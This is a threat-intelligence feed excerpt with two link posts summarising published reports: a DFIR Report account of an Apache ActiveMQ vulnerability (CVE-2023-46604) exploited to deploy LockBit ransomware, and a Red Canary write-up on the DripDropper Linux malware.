The Threat CodexFeb 25
Apache ActiveMQ Exploit Leads to LockBit Ransomware
#CVE_2023_46604 #LockBitBlack
https://thedfirreport.com/2026/02/23/apache-activemq-exploit-leads-to-lockbit-ransomware/
Apache ActiveMQ Exploit Leads to LockBit Ransomware - The DFIR Report

Key Takeaways An audio version of this report can be found on Spotify, Apple, YouTube, Audible, & Amazon.  This intrusion began in mid-February 2024 after a threat actor exploited a vulnerability (CVE-2023-46604) on an exposed Apache ActiveMQ server. The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring […]

The DFIR Report
The Threat CodexAug 19, 2025
Patching for persistence: How DripDropper Linux malware moves through the cloud
#DripDropper #CVE_2023_46604
https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/
Patching for persistence: How DripDropper Linux malware moves through the cloud | Red Canary

DripDropper is a Red Canary-named Linux malware variant that uses an encrypted PyInstaller ELF file to communicate with a Dropbox account.

Red Canary